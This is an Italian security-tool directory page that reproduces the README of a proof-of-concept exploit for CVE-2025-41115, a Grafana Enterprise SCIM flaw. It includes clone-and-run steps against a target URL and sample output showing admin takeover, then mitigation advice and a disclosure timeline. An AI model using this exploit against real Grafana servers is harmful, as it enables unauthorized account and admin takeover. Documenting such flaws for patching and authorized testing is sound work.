Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-41115 — CVE-2025-41115 | Kitploit
Strumenti/GitHubGitHub/rockmelodies/blackash-cve-2025-41115
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza CloudGestione Identità e Accessi (IAM)Autenticazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
rockmelodies/blackash-cve-2025-41115

Blackash-CVE-2025-41115

CVE-2025-41115

Vedi Repository
1169 mesi faNon ancora revisionato

🔐 CVE-2025-41115: Escalation Critica dei Privilegi SCIM di Grafana

218fa54275e0e31c37b4e5091d9112ba_M

Vulnerabilità critica di escalation dei privilegi SCIM in Grafana Enterprise


🌟 Riepilogo

CVE-2025-41115 è una vulnerabilità Critica (CVSS 10.0) in Grafana Enterprise che interessa la funzionalità di provisioning utenti SCIM.

Quando il provisioning SCIM è abilitato e user_sync_enabled = true, un client SCIM malintenzionato può inviare un externalId numerico, che Grafana mappa erroneamente su un ID utente interno — consentendo a un attaccante di impersonare o sovrascrivere account esistenti, inclusi gli admin. ⚠️ Grafana OSS NON è interessato.


🚨 Impatto

  • 🔓 Compromissione dell'account (inclusi gli account admin)
  • 🚀 Escalation dei privilegi con pieni diritti da admin
  • 🗄️ Accesso a dashboard / dati / configurazioni organizzative
  • 🌐 Sfruttabile in rete con requisiti minimi
  • 🛑 Alto rischio per configurazioni multi-tenant o SSO aziendali

Condizioni richieste per lo sfruttamento:

  1. enableSCIM = true
  2. [auth.scim] user_sync_enabled = true

🧩 Versioni Interessate

VersioneStato
12.0.0 → 12.2.1❌ Vulnerabile
12.3.0✅ Corretto
12.2.1 (build corretta)✅ Corretto
12.1.3

💡 I servizi Grafana gestiti (AWS/Azure/Grafana Cloud) sono stati corretti dai fornitori.


Come usarlo in 3 secondi:

1. Scarica

root@kitploit:~
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git

oppure copia-incolla lo script qui sopra in un file

2. Rendi eseguibile (facoltativo)

root@kitploit:~
chmod +x CVE-2025-41115.py

3. Esegui

root@kitploit:~
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com

Quando l'exploit funziona davvero (cioè il target è vulnerabile e il token è valido), vedrai un output esattamente come questo: testo

root@kitploit:~
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
  "schemas": [
    "urn:ietf:params:scim:schemas:core:2.0:User"
  ],
  "id": "1",                     ←←← THIS IS THE KEY LINE (UID 1 overwritten)
  "externalId": "1",
  "meta": { ... },
  "userName": "[email protected]",
  "name": {
    "formatted": "Pwned User"
  },
  "emails": [
    {
      "value": "[email protected]",
      "primary": true
    }
  ],
  "active": true
}

🔧 Passaggi di Mitigazione

🥇 1. Aggiorna Immediatamente

Aggiorna a 12.3.0 o a una delle release di manutenzione corrette.

🛠️ 2. Controlla la tua configurazione SCIM

Se non stai utilizzando il provisioning SCIM, assicurati di avere:

root@kitploit:~
enableSCIM = false

o

root@kitploit:~
[auth.scim]
user_sync_enabled = false

📜 3. Log di audit

Cerca:

  • Utenti nuovi inattesi
  • Utilizzo di externalId numerico
  • Modifiche ai privilegi

🔐 4. Limiti di fiducia

Assicurati che solo provider di identità fidati possano comunicare con il tuo endpoint SCIM.

👀 5. Monitora lo sfruttamento

Tieni d'occhio login sospetti, eventi di creazione utenti o takeover di admin.


📅 Cronologia

  • 📌 2025-11-04 — Problema scoperto internamente
  • 📌 2025-11-04 — Incidente dichiarato
  • 📌 2025-11-05 — Fornitori cloud informati privatamente e corretti
  • 📌 2025-11-19 — Divulgazione pubblica e rilascio della correzione ufficiale

📝 Note Aggiuntive

  • 🎯 Il difetto è dovuto specificamente alla mappatura da parte di Grafana di externalId numerico → uid interno.
  • 🟢 Lo sfruttamento richiede SCIM con sincronizzazione utenti, quindi molte implementazioni sono sicure per impostazione predefinita — ma devi confermarlo.
  • ⚡ Nessuno sfruttamento confermato in the wild al momento della divulgazione, ma il punteggio CVSS 10 significa che è estremamente pericoloso.

dichiarazione di non responsabilità!!!

Questa PoC è solo per test di sicurezza autorizzati e uso educativo su sistemi di tua proprietà o per i quali hai esplicito permesso scritto di testare. L'uso non autorizzato è illegale e può comportare azioni penali. L'autore e il distributore non si assumono alcuna responsabilità per un uso improprio. Applica subito la patch (≥12.0.6 / 12.3.0+).

Scarica lo strumento
✅ Corretto
12.0.6✅ Corretto